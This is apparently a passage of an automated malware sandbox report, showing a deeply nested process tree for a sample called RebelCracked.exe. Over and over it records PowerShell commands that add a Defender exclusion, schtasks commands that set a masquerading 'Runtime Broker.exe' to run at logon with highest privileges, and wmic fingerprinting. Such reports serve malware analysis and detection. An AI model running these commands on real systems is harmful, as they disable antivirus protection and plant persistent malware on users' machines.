C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"30⤵
- Executes dropped EXE
PID:6388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"31⤵PID:3124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"29⤵PID:6220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'30⤵PID:2620
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST30⤵PID:3304
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"30⤵
- Executes dropped EXE
PID:6672 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"31⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:856 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"32⤵PID:5800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"30⤵PID:3512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'31⤵PID:6540
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST31⤵
- Scheduled Task/Job: Scheduled Task
PID:2860
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"31⤵
- Executes dropped EXE
PID:6416 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"32⤵
- Executes dropped EXE
PID:5224 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"33⤵PID:5236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"31⤵PID:2940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'32⤵PID:4420
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST32⤵
- Scheduled Task/Job: Scheduled Task
PID:6340
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"32⤵
- Executes dropped EXE
PID:5472 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"33⤵
- Executes dropped EXE
PID:4472 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"34⤵PID:4576
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:3124
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"32⤵
- Drops file in System32 directory
PID:5128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'33⤵PID:4828
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST33⤵PID:6520
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV134⤵PID:3304
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"33⤵
- Executes dropped EXE
PID:6956 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"34⤵
- Executes dropped EXE
PID:4360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"35⤵PID:3172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"33⤵PID:5912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'34⤵
- Command and Scripting Interpreter: PowerShell
PID:2140
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST34⤵PID:856
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"34⤵PID:6264
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"35⤵PID:2064
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"36⤵PID:768
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV137⤵PID:6132
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"34⤵
- Drops file in System32 directory
PID:7120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'35⤵PID:5512
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST35⤵PID:4632
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"35⤵PID:5508
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"36⤵PID:5952
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"37⤵PID:4856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"35⤵PID:7144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'36⤵PID:3924
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST36⤵PID:5484
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"36⤵PID:1484
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"37⤵PID:5880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"38⤵PID:3568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"36⤵PID:6828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'37⤵PID:1760
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST37⤵
- Scheduled Task/Job: Scheduled Task
PID:6836
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"37⤵PID:1820
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"38⤵PID:7036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"39⤵PID:6944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"37⤵PID:6780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'38⤵PID:3000
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST38⤵PID:2044
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"38⤵PID:6704
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"39⤵PID:2056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"40⤵PID:5484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"40⤵PID:5576
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid41⤵PID:6168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"40⤵PID:3512
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name41⤵
- Detects videocard installed
PID:5904
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"38⤵PID:6180
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'39⤵
- Command and Scripting Interpreter: PowerShell
PID:4272
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST39⤵PID:5784
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"39⤵PID:5588
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"40⤵PID:5412
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"41⤵PID:5964
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV142⤵PID:2064
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"39⤵
- Drops file in System32 directory
PID:5392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'40⤵
- Command and Scripting Interpreter: PowerShell
PID:5256
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST40⤵
- Scheduled Task/Job: Scheduled Task
PID:2008
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"40⤵PID:5828
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"41⤵PID:416
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"42⤵PID:5660
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"40⤵PID:3920
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'41⤵PID:5608
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV142⤵PID:6500
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST41⤵PID:3456
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"41⤵PID:5168
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"42⤵PID:4724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"43⤵PID:6732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"41⤵
- Drops file in System32 directory
PID:2080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'42⤵PID:6256
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST42⤵
- Scheduled Task/Job: Scheduled Task
PID:6220
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"42⤵PID:6784
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"43⤵
- Blocklisted process makes network request
PID:5228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"44⤵PID:2544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"42⤵PID:6700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'43⤵PID:2300
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST43⤵PID:3312
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"43⤵PID:3200
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"44⤵PID:4916
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"45⤵PID:5832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"43⤵
- Drops file in System32 directory
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'44⤵PID:2404
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV145⤵PID:2940
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST44⤵
- Scheduled Task/Job: Scheduled Task
PID:5404
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"44⤵PID:2948
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"45⤵PID:5792
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"46⤵PID:5892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"44⤵PID:6076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'45⤵PID:6560
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST45⤵
- Scheduled Task/Job: Scheduled Task
PID:2552
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"45⤵PID:6932
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"46⤵
- Blocklisted process makes network request
PID:7000 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"47⤵PID:1396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"45⤵PID:6756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'46⤵
- Command and Scripting Interpreter: PowerShell
PID:1384
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST46⤵PID:4004
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"46⤵PID:6352
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"47⤵PID:5992
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"48⤵PID:1156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"46⤵PID:6228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'47⤵PID:5608
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST47⤵PID:568
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"47⤵PID:7108
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"48⤵PID:5824
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"49⤵PID:6136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"47⤵PID:4064
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'48⤵
- Command and Scripting Interpreter: PowerShell
PID:3068
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST48⤵
- Scheduled Task/Job: Scheduled Task
PID:5892 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV149⤵PID:1396
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"48⤵PID:2416
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"49⤵
- Blocklisted process makes network request
PID:1940 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"50⤵PID:6972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"48⤵PID:6432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'49⤵PID:2148
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST49⤵PID:5996
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"49⤵PID:4108
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"50⤵PID:5552
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"51⤵PID:5820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"49⤵PID:6372
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'50⤵PID:920
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST50⤵PID:1876
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"50⤵PID:5612
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"51⤵PID:4980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"52⤵PID:3612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"52⤵PID:6800
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid53⤵PID:1600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"52⤵PID:2908
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name53⤵
- Detects videocard installed
PID:1036
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"50⤵
- Drops file in System32 directory
PID:7044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'51⤵PID:6428
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST51⤵
- Scheduled Task/Job: Scheduled Task
PID:916 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV152⤵PID:6828
-
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"51⤵PID:5624
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"52⤵PID:3224
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"53⤵PID:5228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"51⤵PID:4688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'52⤵PID:392
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST52⤵PID:3380
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"52⤵PID:6672
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"53⤵PID:6208
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"54⤵PID:2212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"52⤵PID:6312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'53⤵PID:4660
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST53⤵PID:4640
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"53⤵PID:6432
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"54⤵PID:3484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"55⤵PID:1248
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV156⤵PID:5892
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"53⤵PID:4276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'54⤵
- Command and Scripting Interpreter: PowerShell
PID:6324
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST54⤵
- Scheduled Task/Job: Scheduled Task
PID:6400
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"54⤵PID:2404
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"55⤵PID:4308
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"56⤵PID:4708
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"54⤵PID:4084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'55⤵PID:1940
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST55⤵PID:6772
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"55⤵PID:3328
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"56⤵PID:5968
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"57⤵PID:8
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"55⤵PID:2260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'56⤵PID:7008
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV157⤵PID:1820
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST56⤵PID:5972
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"56⤵PID:5600
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"57⤵PID:2268
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"58⤵PID:1160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"56⤵
- Drops file in System32 directory
PID:2984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'57⤵PID:4556
-
-
